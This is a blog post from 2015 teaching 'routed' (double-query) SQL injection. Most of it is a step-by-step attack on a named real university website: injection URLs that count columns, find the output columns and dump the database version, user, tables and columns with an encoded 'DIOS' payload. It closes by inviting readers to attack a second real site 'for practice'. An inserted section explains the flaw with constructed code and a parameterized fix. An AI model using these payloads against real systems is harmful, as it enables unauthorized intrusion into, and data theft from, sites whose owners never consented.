Saturday, 06 June 2015

Double Query SQL Injection | Routed SQL Injection

Routed SQL injection may sound unfamiliar or difficult to many injectors, because it is a newer concept that confuses many of them.

Routed SQL injection is a situation where the injectable query is not the one that produces the output; instead, the output of the injectable query is passed into a second query, and that second query produces the output.

In simple words, routed SQL injection can be the scenario when you are not able to see any output after using "union select". Earlier, when I was playing with SQL injection, I found a website where I was not getting any output, so it struck me that maybe the output was not coming to the page; then it must be going somewhere, and that somewhere is another SQL query.
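The two-query flow described above, as an added example that is not part of the original post: one function builds both queries by string concatenation, and a hardened version binds both the request parameter and the value routed out of the first query. The schema, function names and the `ROUTED` input are constructed for illustration, and Python's sqlite3 stands in for the PHP/MySQL application.

```python
import sqlite3

def make_db():
    """Constructed sample schema: page id -> section name -> content."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages(id TEXT, section TEXT);
        CREATE TABLE content(section TEXT, body TEXT);
        CREATE TABLE users(name TEXT, secret TEXT);
        INSERT INTO pages VALUES ('40', 'about');
        INSERT INTO content VALUES ('about', 'About us');
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return db

def render_vulnerable(db, pageid):
    # Query 1 is injectable, but its result is never shown to the user.
    q1 = "SELECT section FROM pages WHERE id = ('%s')" % pageid
    row = db.execute(q1).fetchone()
    if row is None:
        return []
    # Query 2 is built from query 1's result and is the one that is displayed.
    q2 = "SELECT body FROM content WHERE section = '%s'" % row[0]
    return [r[0] for r in db.execute(q2)]

def render_hardened(db, pageid):
    # Bind the request parameter, and also bind the value routed from query 1:
    # data read back from the database is still untrusted input to query 2.
    row = db.execute("SELECT section FROM pages WHERE id = ?", (pageid,)).fetchone()
    if row is None:
        return []
    rows = db.execute("SELECT body FROM content WHERE section = ?", (row[0],))
    return [r[0] for r in rows]

# Constructed input with the shape described above: the UNION in query 1
# returns a string that is itself SQL aimed at query 2.
ROUTED = "0') UNION SELECT 'x'' UNION SELECT secret FROM users--' --"

if __name__ == "__main__":
    db = make_db()
    print(render_vulnerable(db, "40"))    # normal page content
    print(render_vulnerable(db, ROUTED))  # query 2 returns rows from users
    print(render_hardened(db, ROUTED))    # no page matches, nothing returned
```

Binding only the first query would stop this particular input, but the second query would still be injectable through any hostile value already stored in `pages.section`, which is why both are bound.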

---------------------------------------------
Demo time
---------------------------------------------
This is our target for routed SQL injection:
https://www.mylakehead.ca/?pageid=40
To confirm it is vulnerable, we put ' or " or ) etc.:

https://www.mylakehead.ca/?pageid=40'


Query fixed!!
https://www.mylakehead.ca/?pageid=40') --+

Now going to find the columns by using ORDER BY:

 https://www.mylakehead.ca/?pageid=40') order by 1--+



 https://www.mylakehead.ca/?pageid=40') order by 100--+

This way I found that it has 13 columns.

Now going to find the vulnerable column!!!
 https://www.mylakehead.ca/?pageid=.40')Union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+



I did everything, like making the query false and making the query true; it does not show the vulnerable columns!!



 https://www.mylakehead.ca/?pageid=.40') And  False Union select 1,2,3,4,5,6,7,8,9,10,11,Null,Null--+

Nothing happened!!
When I nulled the 1, the result changed!! It occurs only for 1...
When I changed 1 into 111, the result of the page also changed :p


From here I guess it is routed SQLi....

So ...

 https://www.mylakehead.ca/?pageid=.40')Union select "1'",2,3,4,5,6,7,8,9,10,11,12,13--+





It generates an error, which is SQLi. That's good for us!!

Query fixing:

 https://www.mylakehead.ca/?pageid=.40')Union select "1'--+",2,3,4,5,6,7,8,9,10,11,12,13--+
To find the columns again:
 https://www.mylakehead.ca/?pageid=.40')Union select "1' order by 1--+",2,3,4,5,6,7,8,9,10,11,12,13--+ 

It also has 13 columns!
 https://www.mylakehead.ca/?pageid=.40')Union select "1' And 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+ ",2,3,4,5,6,7,8,9,10,11,12,13--+


As you can see, 3, 6 and 5 are vulnerable; they are printed on the screen!!

Now going to dump the tables and columns directly :D by using DIOS:
 https://www.mylakehead.ca/?pageid=.40')Union select "1' And 0 union select 1,2,concat/***/(0x223e3c2f7461626c653e3c2f6469763e3c2f613e3c666f6e7420636f6c6f723d677265656e3e3c62723e3c62723e3c62723e,0x3c666f6e7420666163653d63616d62726961207374796c653d726567756c61722073697a653d3320636f6c6f723d7265643e7e7e7e7e7e3a3a3a3a3a496e6a65637465642062792041664768416e493a3a3a3a3a7e7e7e7e7e3c62723e3c666f6e7420636f6c6f723d626c75653e2056657273696f6e203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,version(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e204461746162617365203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,database(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e2055736572203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,user(),0x3c62723e3c666f6e7420636f6c6f723d7265643e205461626c657320203c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e436f6c756d6e733c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e,@:=0,%28Select+count(*)from%28information_Schema.columns)where(table_schema=database())and@:=concat/**/(@,0x3c6c693e,0x3c666f6e7420636f6c6f723d7265643e,table_name,0x3c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a2020203c666f6e7420636f6c6f723d677265656e3e,column_name,0x3c2f666f6e743e)),@,0x3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e),4,5,6,7,8,9,10,11,12,13--+ ",2,3,4,5,6,7,8,9,10,11,12,13--+




For practice!!! :D
www.agritechno.ch/index2.php?rub=11

Test your skills!! :D

